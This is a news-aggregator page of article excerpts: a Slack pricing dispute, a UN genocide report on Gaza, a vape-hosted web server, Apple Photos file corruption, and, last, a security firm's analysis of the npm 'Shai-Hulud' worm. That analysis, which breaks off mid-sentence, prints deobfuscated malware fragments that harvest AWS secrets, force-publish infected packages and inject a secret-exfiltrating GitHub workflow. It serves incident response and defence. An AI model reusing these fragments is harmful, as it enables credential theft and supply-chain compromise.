10 interesting stories served every morning and every evening.




1 2,627 shares, 143 trendiness

Slack is extorting us with a $195k/yr bill increase

Slack is ex­tort­ing us with a $195k/yr bill in­crease An open let­ter, or some­thing

For nearly 11 years, Hack Club - a non­profit that pro­vides cod­ing ed­u­ca­tion and com­mu­nity to teenagers world­wide - has used Slack as the tool for com­mu­ni­ca­tion. We weren’t free­load­ers. A few years ago, when Slack tran­si­tioned us from their free non­profit plan to a $5,000/year arrange­ment, we hap­pily paid. It was rea­son­able, and we val­ued the ser­vice they pro­vided to our com­mu­nity.

However, two days ago, Slack reached out to us and said that if we don’t agree to pay an ex­tra $50k this week and $200k a year, they’ll de­ac­ti­vate our Slack work­space and delete all of our mes­sage his­tory.

One could ar­gue that Slack is free to stop pro­vid­ing us the non­profit of­fer at any time, but in my opin­ion, a six month grace pe­riod is the bare min­i­mum for a mas­sive hike like this, if not more. Essentially, Salesforce (a $230 bil­lion com­pany) is strong-arm­ing a small non­profit for teens, by pro­vid­ing less than a week to pony up a pretty mas­sive sum of money, or risk cut­ting off all our com­mu­ni­ca­tions. That’s ab­surd.

The small amount of no­tice has also been cat­a­strophic for the pro­grams that we run. Dozens of our staff and vol­un­teers are now scram­bling to up­date sys­tems, re­build in­te­gra­tions and mi­grate years of in­sti­tu­tional knowl­edge. The op­por­tu­nity cost of this forced mi­gra­tion is sim­ply stag­ger­ing.

Anyway, we’re mov­ing to Mattermost. This ex­pe­ri­ence has taught us that own­ing your data is in­cred­i­bly im­por­tant, and if you’re a small busi­ness es­pe­cially, then I’d ad­vise you move away too.

This post was rushed out be­cause, well, this has been a shock! If you’d like any ad­di­tional de­tails then feel free to send me an email.

...

Read the original on skyfall.dev »

2 1,230 shares, 45 trendiness

Top UN legal investigators conclude Israel is guilty of genocide in Gaza

The UNs top in­ves­tiga­tive body on Palestine and Israel ruled on Tuesday that Israel is guilty of the crime of geno­cide in Gaza, in the most au­thor­i­ta­tive pro­nounce­ment to date.

The 72-page re­port by the UN com­mis­sion of in­quiry on Palestine and Israel finds Israel has com­mit­ted four of the five acts pro­hib­ited un­der the 1948 Genocide Convention, and that Israeli lead­ers had the in­tent to de­stroy Palestinians in Gaza as a group.

The find­ing echoes re­ports by Palestinian, Israeli and in­ter­na­tional rights groups that have reached the same con­clu­sion over the past year.

But this is the first com­pre­hen­sive le­gal probe by a UN body, serv­ing as an in­di­ca­tor of a judg­ment by the International Court of Justice (ICJ), which is cur­rently hear­ing a case by South Africa ac­cus­ing Israel of geno­cide. The ICJ case is ex­pected to take sev­eral years to be con­cluded.

For the find­ing on Israel’s re­spon­si­bil­ity for its con­duct in Gaza, the com­mis­sion used the le­gal stan­dard set forth by the International Court of Justice. This is there­fore the most au­thor­i­ta­tive find­ing em­a­nat­ing from the United Nations to date,” Navi Pillay, the com­mis­sion’s chair, told Middle East Eye.

Reports gen­er­ated by the United Nations, in­clud­ing by a com­mis­sion of in­quiry, bear par­tic­u­lar pro­ba­tive value and can be re­lied upon by all do­mes­tic and in­ter­na­tional courts.”

Pillay, a promi­nent ju­rist who pre­vi­ously served as the UNs high com­mis­sioner for hu­man rights and the President of the International Criminal Tribunal for Rwanda, said all states had an un­equiv­o­cal le­gal oblig­a­tion to pre­vent the geno­cide in Gaza. She also urged the UK gov­ern­ment to re­view its stance on the Gaza geno­cide, in­clud­ing its re­fusal to la­bel it as such.

The oblig­a­tion to pre­vent geno­cide arises when states learn of the ex­is­tence of a se­ri­ous risk of geno­cide and thus states, in­clud­ing the UK, must act with­out the need to wait for a ju­di­cial de­ter­mi­na­tion to pre­vent geno­cide,” she said.

Another mem­ber of the com­mis­sion, Chris Sidoti, told MEE that states must act now to pre­vent geno­cide. There is no ex­cuse now for not act­ing,” he said.

The UN re­port will re­main the most au­thor­i­ta­tive state­ment un­til the International Court of Justice com­pletes and rules on the geno­cide case brought against Israel.”

The re­port is due to be pre­sented to the UN General Assembly in October.

This is the most au­thor­i­ta­tive find­ing em­a­nat­ing from the United Nations to date’

It calls on UN mem­ber states to take sev­eral mea­sures, in­clud­ing halt­ing arms trans­fers to Israel and im­pos­ing sanc­tions against Israel and in­di­vid­u­als or cor­po­ra­tions that are in­volved in or fa­cil­i­tat­ing geno­cide or in­cite­ment to com­mit the crime.

The re­port con­cluded that Israel has com­mit­ted geno­cide against Palestinians in Gaza since 7 October 2023, cov­er­ing the pe­riod from that date un­til 31 July 2025.

It said that Israel has com­mit­ted four acts of geno­cide:

Killing mem­bers of the group: Palestinians were killed in large num­bers through di­rect at­tacks on civil­ians, pro­tected per­sons, and vi­tal civil­ian in­fra­struc­ture, as well as by the de­lib­er­ate cre­ation of con­di­tions that led to death.

Causing se­ri­ous bod­ily or men­tal harm: Palestinians suf­fered tor­ture, rape, sex­ual as­sault, forced dis­place­ment, and se­vere mis­treat­ment in de­ten­tion, along­side wide­spread at­tacks on civil­ians and the en­vi­ron­ment.

Inflicting con­di­tions of life cal­cu­lated to de­stroy the group: Israel de­lib­er­ately im­posed in­hu­mane liv­ing con­di­tions in Gaza, in­clud­ing de­struc­tion of es­sen­tial in­fra­struc­ture, de­nial of med­ical care, forced dis­place­ment, block­ing of food, wa­ter, fuel, and elec­tric­ity, re­pro­duc­tive vi­o­lence, and star­va­tion as a method of war­fare. Children were found to be par­tic­u­larly tar­geted.

Preventing births within the group: The at­tack on Gaza’s largest fer­til­ity clinic de­stroyed thou­sands of em­bryos, sperm sam­ples, and eggs. Experts told the com­mis­sion this would pre­vent thou­sands of Palestinian chil­dren from ever be­ing born.

In ad­di­tion to the geno­ci­dal acts, the in­ves­ti­ga­tion con­cluded that the Israeli au­thor­i­ties and se­cu­rity forces have the geno­ci­dal in­tent to de­stroy, in whole or in part, the Palestinians in the Gaza Strip

Genocidal in­tent is of­ten the hard­est to prove in any geno­cide case. But the au­thors of the re­port have found fully con­clu­sive ev­i­dence” of such in­tent.

They cited state­ments made by Israeli au­thor­i­ties, in­clud­ing President Isaac Herzog, Prime Minister Benjamin Netanyahu and Yoav Gallant - who served as de­fence min­is­ter for much of the war - as di­rect ev­i­dence of geno­ci­dal in­tent.

It also found that the three lead­ers have com­mit­ted the crime of in­cite­ment to geno­cide, a sub­stan­tive crime un­der Article III of the con­ven­tion, re­gard­less of whether geno­cide was com­mit­ted.

Additionally, on the ba­sis of cir­cum­stan­tial ev­i­dence, the com­mis­sion found that geno­ci­dal in­tent was the only rea­son­able in­fer­ence” that could be drawn based on the pat­tern of con­duct of the Israeli au­thor­i­ties. That is the same stan­dard of proof that will be used by the ICJ in its cur­rent pro­ceed­ings against Israel.

The com­mis­sion said it iden­ti­fied six pat­terns of con­duct by Israeli forces in Gaza that sup­port an in­fer­ence of geno­ci­dal in­tent:

Mass killings: Israeli forces have killed and se­ri­ously harmed an un­prece­dented num­ber of Palestinians since 7 October 2023, mostly civil­ians, us­ing heavy mu­ni­tions in densely pop­u­lated ar­eas. By 15 July 2025, 83 per­cent of those killed were civil­ians, the re­port found. Nearly half were women and chil­dren.

Cultural de­struc­tion: The sys­tem­atic lev­el­ing of homes, schools, mosques, churches, and cul­tural sites was cited as ev­i­dence of an ef­fort to erase Palestinian iden­tity.

Deliberate suf­fer­ing: Despite three pro­vi­sional or­ders from the ICJ and re­peated in­ter­na­tional warn­ings, Israel con­tin­ued poli­cies know­ing Palestinians were trapped and un­able to flee, the com­mis­sion said.

Collapse of health­care: Israeli forces tar­geted Gaza’s health­care sys­tem, at­tack­ing hos­pi­tals, killing and abus­ing med­ical per­son­nel, and block­ing vi­tal sup­plies and pa­tient evac­u­a­tions.

Sexual vi­o­lence: Investigators doc­u­mented sex­u­alised tor­ture, rape, and other forms of gen­der-based vi­o­lence, de­scrib­ing them as tools of col­lec­tive pun­ish­ment.

Targeting chil­dren: Children were shot by snipers and drones, in­clud­ing dur­ing evac­u­a­tions and at shel­ters, with some killed while car­ry­ing white flags.

Israeli po­lit­i­cal and mil­i­tary lead­ers are agents of the State of Israel; there­fore, their acts are at­trib­ut­able to the State of Israel,” the re­port read.

The State of Israel bears re­spon­si­bil­ity for the fail­ure to pre­vent geno­cide, the  com­mis­sion of geno­cide and the fail­ure to pun­ish geno­cide against the Palestinians in the Gaza Strip.”

The three-mem­ber com­mis­sion of in­quiry was es­tab­lished in May 2021 by the Geneva-based UN Human Rights Council (HRC) with a per­ma­nent man­date to in­ves­ti­gate in­ter­na­tional hu­man­i­tar­ian and hu­man rights law vi­o­la­tions in oc­cu­pied Palestine and Israel from April 2021.

The com­mis­sion is man­dated to re­port an­nu­ally to the HRC and the UN General Assembly. Its mem­bers are in­de­pen­dent ex­perts, un­paid by the UN, on an open-ended man­date.

The com­mis­sion’s re­ports are highly au­thor­i­ta­tive and are widely cited by in­ter­na­tional le­gal bod­ies, in­clud­ing the ICJ and the International Criminal Court in The Hague.

Over the past four years, it has pro­duced some of the most ground­break­ing re­ports on in­ter­na­tional law breaches in Israel and Palestine.

Since 7 October 2023, the com­mis­sion has is­sued three re­ports and three pa­pers on in­ter­na­tional law breaches by dif­fer­ent par­ties.

Previous re­ports have con­cluded that Israeli forces have com­mit­ted crimes against hu­man­ity and war crimes in Gaza, in­clud­ing, among oth­ers, ex­ter­mi­na­tion, tor­ture, rape, sex­ual vi­o­lence and star­va­tion as a method of war­fare. They also con­cluded that two acts of geno­cide had been com­mit­ted in Gaza.

Its three mem­bers are em­i­nent hu­man rights and le­gal ex­perts.

Pillay served as UN high com­mis­sioner for hu­man rights from 2008 to 2014. She pre­vi­ously served as a judge in the ICJ and presided over the UNs ad hoc tri­bunal for Rwanda.

Miloon Kothari served as the first UN spe­cial rap­por­teur on ad­e­quate hous­ing be­tween 2000 and 2008, while Sidoti is the for­mer Australian hu­man rights com­mis­sioner and pre­vi­ously served as a mem­ber of the UN Independent International Fact-Finding Mission on Myanmar from 2017 to 2019.

...

Read the original on www.middleeasteye.net »

3 1,218 shares, 48 trendiness

Hosting a WebSite on a Disposable Vape

This ar­ti­cle is NOT served from a web server run­ning on a dis­pos­able vape. If you want to see the real deal, click here. The con­tent is oth­er­wise iden­ti­cal.

For a cou­ple of years now, I have been col­lect­ing dis­pos­able vapes from friends and fam­ily. Initially, I only sal­vaged the bat­ter­ies for future” pro­jects (It’s not hoard­ing, I promise), but re­cently, dis­pos­able vapes have got­ten more ad­vanced. I would­n’t want to be the lawyer who one day will have to ar­gue how a de­vice with USB C and a recharge­able bat­tery can be clas­si­fied as disposable”. Thankfully, I don’t plan on pur­su­ing law any­time soon.

Last year, I was tear­ing apart some of these fancier paci­fiers for adults when I no­ticed some­thing that caught my eye, in­stead of the ex­pected black blob of goo hid­ing some ASIC (Application Specific Integrated Circuit) I see a lit­tle in­te­grated cir­cuit in­scribed PUYA. I don’t blame you if this name does­n’t ex­cite you as much it does me, most peo­ple have never heard of them. They are most well known for their flash chips, but I first came across them af­ter read­ing Jay Carlson’s blog post about the cheap­est flash mi­cro­con­troller you can buy. They are quite ca­pa­ble lit­tle ARM Cortex-M0+ mi­cros.

Over the past year I have col­lected quite a few of these PY32 based vapes, all of them from dif­fer­ent mod­els of vape from the same man­u­fac­turer. It’s not my place to do free ad­ver­tis­ing for big to­bacco, so I won’t men­tion the brand I got it from, but if any­one who worked on de­sign­ing them reads this, thanks for la­bel­ing the de­bug pins!

The chip is marked PUYA C642F15, which was­n’t very help­ful. I was pretty sure it was a PY32F002A, but af­ter pok­ing around with py­OCD, I no­ticed that the flash was 24k and we have 3k of RAM. The ex­tra flash meant that it was more likely a PY32F002B, which is ac­tu­ally a very dif­fer­ent chip.

So here are the specs of a mi­cro­con­troller so bad, it’s ba­si­cally dis­pos­able:

* a few pe­riph­er­als, none of which we will use.

You may look at those specs and think that it’s not much to work with. I don’t blame you, a 10y old phone can barely load google, and this is about 100x slower. I on the other hand see a blaz­ingly fast web server.

The idea of host­ing a web server on a vape did­n’t come to me in­stantly. In fact, I have been play­ing around with them for a while, but af­ter writ­ing my post on semi­host­ing, the penny dropped.

If you don’t feel like read­ing that ar­ti­cle, semi­host­ing is ba­si­cally syscalls for em­bed­ded ARM mi­cro­con­trollers. You throw some val­ues/​point­ers into some reg­is­ters and call a break­point in­struc­tion. An at­tached de­bug­ger in­ter­prets the val­ues in the reg­is­ters and per­forms cer­tain ac­tions. Most peo­ple just use this to get some logs printed from the mi­cro­con­troller, but they are ac­tu­ally bi-di­rec­tional.

If you are older than me, you might re­mem­ber a time be­fore Wi-Fi and Ethernet, the dark ages, when you had to use dial-up modems to get on­line. You might also know that the ghosts of those modems still linger all around us. Almost all USB se­r­ial de­vices ac­tu­ally em­u­late those modems: a 56k mo­dem is just 57600 baud se­r­ial de­vice. Data be­tween some of these modems was trans­mit­ted us­ing a pro­to­col called SLIP (Serial Line Internet Protocol).

This may not come as a sur­prise, but Linux (and with some tweak­ing even ma­cOS) sup­ports SLIP. The slat­tach util­ity can make any /dev/tty* send and re­ceive IP pack­ets. All we have to do is put the data down the wire in the right for­mat and pro­vide a vir­tual tty. This is ac­tu­ally eas­ier than you might imag­ine, py­OCD can for­ward all semi­host­ing though a tel­net port. Then, we use so­cat to link that port to a vir­tual tty:

Ok, so we have a modem”, but that’s hardly a web server. To ac­tu­ally talk TCP/IP, we need an IP stack. There are many choices, but I went with uIP be­cause it’s pretty small, does­n’t re­quire an RTOS, and it’s easy to port to other plat­forms. It also, help­fully, comes with a very min­i­mal HTTP server ex­am­ple.

After port­ing the SLIP code to use semi­host­ing, I had a work­ing web server…half of the time. As with most highly op­ti­mised li­braries, uIP was de­signed for 8 and 16-bit ma­chines, which rarely have mem­ory align­ment re­quire­ments. On ARM how­ever, if you deref­er­ence a u16 *, you bet­ter hope that ad­dress is even, or you’ll get an ex­cep­tion. The uip_chk­sum as­sumed u16 align­ment, but the script that cre­ates the filesys­tem did­n’t. I ac­tu­ally de­cided to mod­ify a bit the struc­ture of the filesys­tem to make it a bit more portable. This was my first time work­ing with perl and I have to say, it’s quite well suited to this kind of task.

So how fast is a web server run­ning on a dis­pos­able mi­cro­con­troller. Well, ini­tially, not very fast. Pings took ~1.5s with 50% packet loss and a sim­ple page took over 20s to load. That’s so bad, it’s ac­tu­ally funny, and I kind of wanted to leave it there.

However, the prob­lem was ac­tu­ally be­tween the seat and the steer­ing wheel the whole time. The first im­ple­men­ta­tion read and wrote a sin­gle char­ac­ter at a time, which had a mas­sive over­head as­so­ci­ated with it. I pre­vi­ously bench­marked semi­host­ing on this de­vice, and I was get­ting ~20KiB/s, but uIP’s SLIP im­ple­men­ta­tion was de­signed for very low mem­ory de­vices, so it was se­ri­al­is­ing the data byte by byte. We have a whop­ping 3kiB of RAM to play with, so I added a ring buffer to cache reads from the host and feed them into the SLIP poll func­tion. I also split writes in batches to al­low for es­cap­ing.

Now this is what I call blaz­ingly fast! Pings now take 20ms, no packet loss and a full page loads in about 160ms. This was us­ing us­ing al­most all of the RAM, but I could also dial down the sizes of the buffer to have more than enough head­room to run other tasks. The pro­ject repo has every­thing set to a nice bal­ance la­tency and RAM us­age:

Memory re­gion Used Size Region Size %age Used

FLASH: 5116 B 24 KB 20.82%

RAM: 1380 B 3 KB 44.92%

For this blog how­ever, I paid for none of the RAM, so I’ll use all of the RAM.

As you may have no­ticed, we have just un­der 20kiB (80%) of stor­age space. That may not be enough to ship all of React, but as you can see, it’s more than enough to host this en­tire blog post. And this is not just a sta­tic page server, you can run any server-side code you want, if you know C that is.

Just for fun, I added a json api end­point to get the num­ber of re­quests to the main page (since the last crash) and the unique ID of the mi­cro­con­troller.

...

Read the original on bogdanthegeek.github.io »

4 1,115 shares, 45 trendiness

Apple Photos App Corrupts Images

The Apple Photos app some­times cor­rupts im­ages when im­port­ing from my cam­era. I just wanted to make a blog post about it in case any­one else runs into the prob­lem. I’ve seen other ref­er­ences to this on­line, but most of the peo­ple gave up try­ing to fix it, and none of them went as far as I did to de­bug the is­sue.

I’ll try to de­scribe the prob­lem, and the things I’ve tried to do to fix it. But also note that I’ve (sort of) given up on the Photos app too. Since I can’t trust it to im­port pho­tos from my cam­era, I switched to a dif­fer­ent work­flow.

Here is a screen­shot of a cor­rupted im­age in the Photos app:

I’ve got an OM System OM-1 cam­era. I used to shoot in RAW + jpg, then when I would im­port to Photos app, I would check the delete pho­tos af­ter im­port” check­box in or­der to empty the SD card. Turns out delete af­ter im­port” was a huge mis­take.

I’m pretty sure I’d been get­ting cor­rupted im­ages for a while, but it would only be 1 or 2 im­ages out of thou­sands, so I thought noth­ing of it (it was prob­a­bly my fault any­way, right?)

But the prob­lem re­ally got me up­set when last year I went to a fam­ily mem­ber’s wed­ding and took tons of pho­tos. Apple Photos com­bines RAW + jpg pho­tos so you don’t have a bunch of du­pli­cates, and when you view the im­ages in the pho­tos app, it just shows you the jpg ver­sion by de­fault. After I im­ported all of the wed­ding pho­tos I no­ticed some of them were cor­rupted. Upon closer in­spec­tion, I found that it some­times had cor­rupted the jpg, some­times cor­rupted the RAW file, and some­times both. Since I had been check­ing the delete af­ter im­port” box, I did­n’t know if the im­ages on the SD card were cor­rupted be­fore im­port­ing or not. After all, the files had been deleted so there was no way to check.

I es­ti­mate I com­pletely lost about 30% of the im­ages I took that day.

Losing so many pho­tos re­ally rat­tled me, but I wanted to fig­ure out the prob­lem so I did­n’t lose im­ages in the fu­ture.

I was wor­ried this was some­how a hard­ware prob­lem. Copying files seems so ba­sic, I did­n’t think there was any way a mas­sively de­ployed app like Photos could fuck it up (especially since its main job is man­ag­ing photo files). So, to nar­row down the is­sue I changed out all of the hard­ware. Here are all the things I did:

* Bought a new SD card di­rect from the man­u­fac­turer (to elim­i­nate the pos­si­bil­ity of buy­ing a boot­leg SD card)

* Switched to only shoot­ing in RAW (if im­port­ing messes up 30% of my im­ages, but I cut the num­ber of im­ages I im­port by half, then that should be fewer cor­rupted im­ages right? lol)

I did each of these steps over time, as to only change one vari­able at a time, and still the im­age cor­rup­tion per­sisted. I did­n’t re­ally want to buy a new cam­era, the MKii is not re­ally a big im­prove­ment over the OM-1, but we had a fam­ily trip com­ing up and the idea that press­ing the shut­ter but­ton on the cam­era might not ac­tu­ally record the im­age did­n’t sit well with me.

Since I had re­placed lit­er­ally all of the hard­ware in­volved, I knew it must be a soft­ware prob­lem. I stopped check­ing the delete af­ter im­port” but­ton, and started re­view­ing all of the pho­tos af­ter im­port. After ver­i­fy­ing none of them were cor­rupt, then I would for­mat the SD card. I did this for months with­out find­ing any cor­rupt files. At this point I fig­ured it was some­how a race con­di­tion or some­thing when copy­ing the photo files and delet­ing them at the same time.

However, af­ter I got home from RailsConf and im­ported my pho­tos, I found one cor­rupt im­age (the one above). I was able to ver­ify that the im­age was not cor­rupt on the SD card, so the cam­era was work­ing fine (meaning I prob­a­bly did­n’t need to buy a new cam­era body at all).

I tried delet­ing the cor­rupt file and re-im­port­ing the orig­i­nal to see if it was some­thing about that par­tic­u­lar im­age, but it re-im­ported just fine. In other words, it seems like the Photos app will cor­rupt files ran­domly.

I don’t know if this is a prob­lem that is spe­cific to OM System cam­eras, and I’m not par­tic­u­larly in­ter­ested in in­vest­ing in a new cam­era sys­tem just to find out.

If I com­pare the cor­rupted im­age with the non-cor­rupted im­age, the file sizes are ex­actly the same, but the bytes are dif­fer­ent:

aaron@tc ~/Downloads> md5­sum P7110136-from-camera.ORF Exports/P7110136.ORF

17ce895fd809a43bad1fe8832c811848 P7110136-from-camera.ORF

828a33005f6b71aea16d9c2f2991a997 Exports/P7110136.ORF

aaron@tc ~/Downloads> ls -al P7110136-from-camera.ORF Exports/P7110136.ORF

-rw–––-@ 1 aaron staff 18673943 Jul 12 04:38 Exports/P7110136.ORF

-rwx––– 1 aaron staff 18673943 Jul 17 09:29 P7110136-from-camera.ORF*

The P7110136-from-camera. ORF is the non-cor­rupted file, and Exports/P7110136.ORF is the cor­rupted file from Photos app. Here’s a screen­shot of the pre­view of the non-cor­rupted photo:

Here is the bi­nary diff be­tween the files. I ran both files through xxd then diffed them. Also if any­one cares to look, I’ve posted the RAW files here on GitHub.

I’m not go­ing to put any more ef­fort into de­bug­ging this prob­lem, but I wanted to blog about it in case any­one else is see­ing the is­sue. I take a lot of pho­tos, and to be frank, most of them are not very good. I don’t want to look through a bunch of bad pho­tos every time I look at my li­brary, so culling pho­tos is im­por­tant. Culling pho­tos in the Photos app is way too cum­ber­some, so I’ve switched to us­ing Darktable.

* Delete the ones I don’t like

* Process ones I do like

* Export both the jpg and the orig­i­nal raw file

* Import those to the Photos app so they’re easy to view and share

I’ve not seen any file cor­rup­tion when im­port­ing to Darktable, so I am con­vinced this is a prob­lem with the Photos app. But now, since all of my im­ages land in Darktable be­fore mak­ing their way to the Photos app, I don’t re­ally care any­more. The bad news is that I’ve spent a lot of time and money try­ing to de­bug this. I guess the good news is that now I have re­dun­dant hard­ware!

...

Read the original on tenderlovemaking.com »

5 1,065 shares, 42 trendiness

ctrl/tinycolor and 40+ NPM Packages Compromised

The pop­u­lar @ctrl/tinycolor pack­age with over 2 mil­lion weekly down­loads has been com­pro­mised along­side 40+ other NPM pack­ages in a so­phis­ti­cated sup­ply chain at­tack dubbed Shai-Hulud”. The mal­ware self-prop­a­gates across main­tainer pack­ages, har­vests AWS/GCP/Azure cre­den­tials us­ing TruffleHog, and es­tab­lishes per­sis­tence through GitHub Actions back­doors - rep­re­sent­ing a ma­jor es­ca­la­tion in NPM ecosys­tem threats. The NPM ecosys­tem is fac­ing an­other crit­i­cal sup­ply chain at­tack. The pop­u­lar @ctrl/tinycolor pack­age, which re­ceives over 2 mil­lion weekly down­loads, has been com­pro­mised along with more than 40 other pack­ages across mul­ti­ple main­tain­ers. This at­tack demon­strates a con­cern­ing evo­lu­tion in sup­ply chain threats - the mal­ware in­cludes a self-prop­a­gat­ing mech­a­nism that au­to­mat­i­cally in­fects down­stream pack­ages, cre­at­ing a cas­cad­ing com­pro­mise across the ecosys­tem. The com­pro­mised ver­sions have been re­moved from npm.In this post, we’ll dive deep into the pay­load’s me­chan­ics, in­clud­ing de­ob­fus­cated code snip­pets, API call traces, and di­a­grams to il­lus­trate the at­tack chain. Our analy­sis re­veals a Webpack-bundled script (bundle.js) that lever­ages Node.js mod­ules for re­con­nais­sance, har­vest­ing, and prop­a­ga­tion; tar­get­ing Linux/macOS devs with ac­cess to NPM/GitHub/cloud creds.To help the com­mu­nity re­spond to this in­ci­dent, StepSecurity hosted a Community Office Hour on September 16th at 1 PM PT. The record­ing is avail­able here: https://​www.youtube.com/​watch?v=D9jX­oT1r­taQThe at­tack un­folds through a so­phis­ti­cated multi-stage chain that lever­ages Node.js’s process.env for op­por­tunis­tic cre­den­tial ac­cess and em­ploys Webpack-bundled mod­ules for mod­u­lar­ity. At the core of this at­tack is a ~3.6MB mini­fied bun­dle.js file, which ex­e­cutes asyn­chro­nously dur­ing npm in­stall. This ex­e­cu­tion is likely trig­gered via a hi­jacked postin­stall script em­bed­ded in the com­pro­mised pack­age.json.The mal­ware in­cludes a self-prop­a­ga­tion mech­a­nism through the NpmModule.updatePackage func­tion. This func­tion queries the NPM reg­istry API to fetch up to 20 pack­ages owned by the main­tainer, then force-pub­lishes patches to these pack­ages. This cre­ates a cas­cad­ing com­pro­mise ef­fect, re­cur­sively in­ject­ing the ma­li­cious bun­dle into de­pen­dent ecosys­tems across the NPM reg­istry.The mal­ware re­pur­poses open-source tools like TruffleHog to scan the filesys­tem for high-en­tropy se­crets. It searches for pat­terns such as AWS keys us­ing reg­u­lar ex­pres­sions like AKIA[0-9A-Z]{16}. Additionally, the mal­ware dumps the en­tire process.env, cap­tur­ing tran­sient to­kens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.For cloud-spe­cific op­er­a­tions, the mal­ware enu­mer­ates AWS Secrets Manager us­ing SDK pag­i­na­tion and ac­cesses Google Cloud Platform se­crets via the @google-cloud/secret-manager API. The mal­ware specif­i­cally tar­gets the fol­low­ing cre­den­tials:The mal­ware es­tab­lishes per­sis­tence by in­ject­ing a GitHub Actions work­flow file (.github/workflows/shai-hulud-workflow.yml) via a base64-en­coded bash script. This work­flow trig­gers on push events and ex­fil­trates repos­i­tory se­crets us­ing the ex­pres­sion ${{ to­J­SON(se­crets) }} to a com­mand and con­trol end­point. The mal­ware cre­ates branches by force-merg­ing from the de­fault branch (refs/heads/shai-hulud) us­ing GitHub’s /git/refs end­point.The mal­ware ag­gre­gates har­vested cre­den­tials into a JSON pay­load, which is pretty-printed for read­abil­ity. It then up­loads this data to a new pub­lic repos­i­tory named Shai-Hulud via the GitHub /user/repos API.The en­tire at­tack de­sign as­sumes Linux or ma­cOS ex­e­cu­tion en­vi­ron­ments, check­ing for os.plat­form() === linux’ || darwin’. It de­lib­er­ately skips Windows sys­tems. For a vi­sual break­down, see the at­tack flow di­a­gram be­low:The com­pro­mise be­gins with a so­phis­ti­cated mini­fied JavaScript bun­dle in­jected into af­fected pack­ages like @ctrl/tinycolor. This is not rudi­men­tary mal­ware but rather a so­phis­ti­cated mod­u­lar en­gine that uses Webpack chunks to or­ga­nize OS util­i­ties, cloud SDKs, and API wrap­pers.The pay­load im­ports six core mod­ules, each serv­ing a spe­cific func­tion in the at­tack chain.This mod­ule calls get­Sys­tem­Info() to build a com­pre­hen­sive sys­tem pro­file con­tain­ing plat­form, ar­chi­tec­ture, plat­form­Raw, and archRaw in­for­ma­tion. It dumps the en­tire process.env, cap­tur­ing sen­si­tive en­vi­ron­ment vari­ables in­clud­ing AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other cre­den­tials that may be pre­sent in the en­vi­ron­ment.The AWS har­vest­ing mod­ule val­i­dates cre­den­tials us­ing the STS AssumeRoleWithWebIdentityCommand. It then enu­mer­ates se­crets us­ing the @aws-sdk/client-secrets-manager li­brary.// Deobfuscated AWS har­vest snip­pet

async getAllSe­cret­Val­ues() {

const se­crets = [];

let next­To­ken;

do {

const resp = await client.send(new ListSecretsCommand({ NextToken: next­To­ken }));

for (const se­cret of resp.Se­cretList || []) {

const value = await client.send(new GetSecretValueCommand({ SecretId: se­cret.ARN }));

se­crets.push({ ARN: se­cret.ARN, SecretString: value.Se­cret­String, SecretBinary: atob(value.Se­cret­Bi­nary) }); // Base64 de­code bi­na­ries

next­To­ken = resp.Next­To­ken;

} while (nextToken);

re­turn se­crets;

}The mod­ule han­dles er­rors such as DecryptionFailure or ResourceNotFoundException silently through dec­o­rate­Ser­vice­Ex­cep­tion wrap­pers. It tar­gets all AWS re­gions via end­point res­o­lu­tion.The GCP mod­ule uses @google-cloud/secret-manager to list se­crets match­ing the pat­tern pro­jects//​se­crets/. It im­ple­ments pag­i­na­tion us­ing nextPage­To­ken and re­turns ob­jects con­tain­ing the se­cret name and de­coded pay­load. The mod­ule fails silently on PERMISSION_DENIED er­rors with­out alert­ing the user.This mod­ule spawns TruffleHog via child_process.exec(‘truf­fle­hog filesys­tem / –json’) to scan the en­tire filesys­tem. It parses the out­put for high-en­tropy matches, such as AWS keys found in ~/.aws/credentials.The NPM prop­a­ga­tion mod­ule parses NPM_TOKEN from ei­ther ~/.npmrc or en­vi­ron­ment vari­ables. After val­i­dat­ing the to­ken via the /whoami end­point, it queries /v1/search?text=maintainer:${username}&size=20 to re­trieve pack­ages owned by the main­tainer.// Deobfuscated NPM up­date snip­pet

async up­datePack­age(pkg) {

// Patch pack­age.json (add self as dep?) and pub­lish

await exec(`npm ver­sion patch –force && npm pub­lish –access pub­lic –token ${token}`);

}This cre­ates a cas­cad­ing ef­fect where an in­fected pack­age leads to com­pro­mised main­tainer cre­den­tials, which in turn in­fects all other pack­ages main­tained by that user.The GitHub back­door mod­ule au­then­ti­cates via the /user end­point, re­quir­ing repo and work­flow scopes. After list­ing or­ga­ni­za­tions, it in­jects ma­li­cious code via a bash script (Module 941).Here is the line-by-line bash script de­con­struc­tion:# Deobfuscated Code snip­pet

#!/bin/bash

GITHUB_TOKEN=“$1”

BRANCH_NAME=“shai-hulud”

FILE_NAME=”.github/workflows/shai-hulud-workflow.yml”

FILE_CONTENT=$(cat <This work­flow is ex­e­cuted as soon as the com­pro­mised pack­age cre­ate a com­mit with it, which im­me­di­ately ex­fil­trates all the se­crets.The mal­ware builds a com­pre­hen­sive JSON pay­load con­tain­ing sys­tem in­for­ma­tion, en­vi­ron­ment vari­ables, and data from all mod­ules. It then cre­ates a pub­lic repos­i­tory via the GitHub /repos POST end­point us­ing the func­tion mak­eRepo(‘Shai-Hu­lud’). The repos­i­tory is pub­lic by de­fault to en­sure easy ac­cess for the com­mand and con­trol in­fra­struc­ture.We are ob­serv­ing hun­dreds of such pub­lic repos­i­to­ries con­tain­ing ex­fil­trated cre­den­tials. A GitHub search for Shai-Hulud” repos­i­to­ries re­veals the on­go­ing and wide­spread na­ture of this at­tack, with new repos­i­to­ries be­ing cre­ated as more sys­tems ex­e­cute the com­pro­mised pack­ages.This ex­fil­tra­tion tech­nique is sim­i­lar to the Nx sup­ply chain at­tack we an­a­lyzed pre­vi­ously, where at­tack­ers also used pub­lic GitHub repos­i­to­ries to ex­fil­trate stolen cre­den­tials. This pat­tern of us­ing GitHub as an ex­fil­tra­tion end­point ap­pears to be a pre­ferred method for sup­ply chain at­tack­ers, as it blends in with nor­mal de­vel­oper ac­tiv­ity and by­passes many tra­di­tional se­cu­rity con­trols.These repos­i­to­ries con­tain sen­si­tive in­for­ma­tion. The pub­lic na­ture of these repos­i­to­ries means that any at­tacker can ac­cess and po­ten­tially mis­use these cre­den­tials, cre­at­ing a sec­ondary risk be­yond the ini­tial com­pro­mise.The at­tack em­ploys sev­eral eva­sion tech­niques in­clud­ing silent er­ror han­dling (swallowed via catch {} blocks), no log­ging out­put, and dis­guis­ing TruffleHog ex­e­cu­tion as a le­git­i­mate security scan.“We an­a­lyzed the ma­li­cious pay­load us­ing StepSecurity Harden-Runner in a 